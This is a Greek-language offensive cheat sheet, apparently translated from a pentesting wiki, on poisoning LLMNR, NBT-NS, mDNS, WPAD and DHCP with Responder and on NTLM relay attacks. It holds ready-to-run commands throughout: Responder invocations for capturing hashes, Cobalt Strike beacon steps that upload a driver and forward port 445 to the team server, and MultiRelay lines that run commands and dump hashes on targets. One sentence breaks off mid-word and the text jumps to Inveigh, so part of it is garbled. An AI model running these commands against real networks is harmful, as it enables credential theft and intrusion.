Πρωτόκολλα Δικτύου

Πρωτόκολλα Τοπικής Ανάλυσης Ονομάτων

• LLMNR, NBT-NS και mDNS:

• Η Microsoft και άλλα λειτουργικά συστήματα χρησιμοποιούν τα LLMNR και NBT-NS για την τοπική ανάλυση ονομάτων όταν αποτυγχάνει το DNS. Αντίστοιχα, τα συστήματα της Apple και του Linux χρησιμοποιούν το mDNS.

• Αυτά τα πρωτόκολλα είναι ευάλωτα σε παρεμβολή και παραπλάνηση λόγω της μη επαληθευμένης, ευρείας φύσης τους μέσω του πρωτοκόλλου UDP.

• Το Responder μπορεί να χρησιμοποιηθεί για να παραπλανήσει υπηρεσίες αποστέλλοντας πλαστές απαντήσεις σε κεντρικούς υπολογιστές που ερωτούν αυτά τα πρωτόκολλα.

• Περισσότερες πληροφορίες για την παραπλάνηση υπηρεσιών χρησιμοποιώντας το Responder μπορούν να βρεθούν εδώ.

Πρωτόκολλο Αυτόματης Ανακάλυψης Ιστοσελίδων Μεσολάβησης (WPAD)

• Το WPAD επιτρέπει στους περιηγητές να ανακαλύπτουν αυτόματα τις ρυθμίσεις μεσολάβησης.

• Η ανακάλυψη γίνεται μέσω DHCP, DNS ή ανατροπή σε LLMNR και NBT-NS αν αποτύχει το DNS.

• Το Responder μπορεί να αυτοματοποιήσει επιθέσεις WPAD, καθοδηγώντας τους πελάτες σε κακόβουλους διακομιστές WPAD.

Παραπλάνηση Πρωτοκόλλου με το Responder

• Το Responder είναι ένα εργαλείο που χρησιμοποιείται για την παραπλάνηση των ερωτημάτων LLMNR, NBT-NS και mDNS, απαντώντας εκλεκτικά βάσει των τύπων ερωτημάτων, κυρίως στις υπηρεσίες SMB.

• Είναι προεγκατεστημένο στο Kali Linux και μπορεί να διαμορφωθεί στο /etc/responder/Responder.conf.

• Το Responder εμφανίζει τις καταγεγραμμένες κατακερματισμένες τιμές στην οθόνη και τις αποθηκεύει στον φάκελο /usr/share/responder/logs.

• Υποστηρίζει τόσο το IPv4 όσο και το IPv6.

• Η έκδοση του Responder για τα Windows είναι διαθέσιμη εδώ.

Εκτέλεση του Responder

• Για να εκτελέσετε το Responder με τις προεπιλεγμένες ρυθμίσεις: responder -I <Διεπαφή>

• Για πιο επιθετική ανίχνευση (με πιθανές παρενέργειες): responder -I <Διεπαφή> -P -r -v

• Τεχνικές για την καταγραφή προκλήσεων/απαντήσεων NTLMv1 για ευκολότερη αποκωδικοποίηση: responder -I <Διεπαφή> --lm --disable-ess

• Η παραπλάνηση του WPAD μπορεί να ενεργοποιηθεί με: responder -I <Διεπαφή> --wpad

• Τα αιτήματα NetBIOS μπορούν να επιλυθούν στη διεύθυνση IP του επιτιθέμενου και μπορεί να δημιουργηθεί ένας πρόσθετος διακομιστής εξουσιοδότησης: responder.py -I <διεπαφή> -Pv

Δηλητηρίαση DHCP με το Responder

• Η παραπλάνηση των απαντήσεων DHCP μπορεί να δηλητηριάσει μόνιμα τις πληροφορίες δρομολόγησης ενός θύματος, προσφέροντας μια πιο αόρατη εναλλακτική λύση στη δηλητηρίαση ARP.

• Απαιτεί ακριβή γνώση της διαμόρφωσης του δικτύου στόχου.

• Εκτέλεση της επίθεσης: ./Responder.py -I eth0 -Pdv

• Αυτή η μέθοδος μπορεί να καταγράψει αποτελεσματικ

Invoke-Inveigh -NBNS Y -ConsoleOutput Y -FileOutput Y

Ή εκτελείται ως ένα δυαδικό αρχείο C#:

Inveigh.exe

Επίθεση NTLM Relay

Αυτή η επίθεση εκμεταλλεύεται τις συνεδρίες ελέγχου ταυτότητας SMB για να αποκτήσει πρόσβαση σε έναν στόχο μηχανής, παρέχοντας ένα κέλυφος συστήματος εάν είναι επιτυχής. Βασικές προϋποθέσεις περιλαμβάνουν:

• Ο αυθεντικοποιούμενος χρήστης πρέπει να έχει τοπική διαχείριση στον υπολογιστή προώθησης.

• Η υπογραφή SMB πρέπει να είναι απενεργοποιημένη.

Προώθηση και τούνελινγκ της θύρας 445

Σε περιπτώσεις όπου δεν είναι εφικτή η άμεση εισαγωγή στο δίκτυο, ο κίνηση στη θύρα 445 πρέπει να προωθηθεί και να τούνελινγκ. Εργαλεία όπως το PortBender βοηθούν στην ανακατεύθυνση της κίνησης της θύρας 445 σε μια άλλη θύρα, η οποία είναι απαραίτητη όταν υπάρχει διαθέσιμη τοπική διαχείριση για φόρτωση οδηγού.

Ρύθμιση και λειτουργία του PortBender στο Cobalt Strike:

Cobalt Strike -> Script Manager -> Load (Select PortBender.cna)

beacon> cd C:\Windows\system32\drivers # Navigate to drivers directory
beacon> upload C:\PortBender\WinDivert64.sys # Upload driver
beacon> PortBender redirect 445 8445 # Redirect traffic from port 445 to 8445
beacon> rportfwd 8445 127.0.0.1 445 # Route traffic from port 8445 to Team Server
beacon> socks 1080 # Establish a SOCKS proxy on port 1080

# Termination commands
beacon> jobs
beacon> jobkill 0
beacon> rportfwd stop 8445
beacon> socks stop

Άλλα Εργαλεία για Επίθεση NTLM Relay

• Metasploit: Ρυθμίζεται με λεπτομέρειες για τοπικούς και απομακρυσμένους διακομιστές.

• smbrelayx: Ένα Python script για την ανακατεύθυνση των συνεδριών SMB και την εκτέλεση εντολών ή την εγκατάσταση παρασκηνίου.

• MultiRelay: Ένα εργαλείο από το σύνολο εργαλείων Responder για την ανακατεύθυνση συγκεκριμένων χρηστών ή όλων των χρηστών, την εκτέλεση εντολών ή την αποθήκευση κατακερματισμένων κωδικών πρόσβασης.

Κάθε εργαλείο μπορεί να ρυθμιστεί για να λειτουργεί μέσω ενός SOCKS proxy αν είναι απαραίτητο, επιτρέποντας επιθέσεις ακόμα και με έμμεση πρόσβαση στο δίκτυο.

Λειτουργία του MultiRelay

Το MultiRelay εκτελείται από τον φάκελο /usr/share/responder/tools, στοχεύοντας συγκεκριμένες διευθύνσεις IP ή χρήστες.

python MultiRelay.py -t <IP target> -u ALL # Relay all users
python MultiRelay.py -t <IP target> -u ALL -c whoami # Execute command
python MultiRelay.py -t <IP target> -u ALL -d # Dump hashes

# Proxychains for routing traffic

Αυτά τα εργαλεία και τεχνικές αποτελούν έναν πλήρη σύνολο για την πραγματοποίηση επιθέσεων NTLM Relay σε διάφορα περιβάλλοντα δικτύου.

Εξαναγκασμός σύνδεσης NTLM

Στα Windows, μπορείτε να εξαναγκάσετε ορισμένους προνομιούχους λογαριασμούς να πιστοποιηθούν σε αυθαίρετες μηχανές. Διαβάστε την παρακάτω σελίδα για να μάθετε πώς:

Αναφορές

• https://intrinium.com/smb-relay-attack-tutorial/

• https://www.4armed.com/blog/llmnr-nbtns-poisoning-using-responder/

• https://www.notsosecure.com/pwning-with-responder-a-pentesters-guide/

• https://intrinium.com/smb-relay-attack-tutorial/

• https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html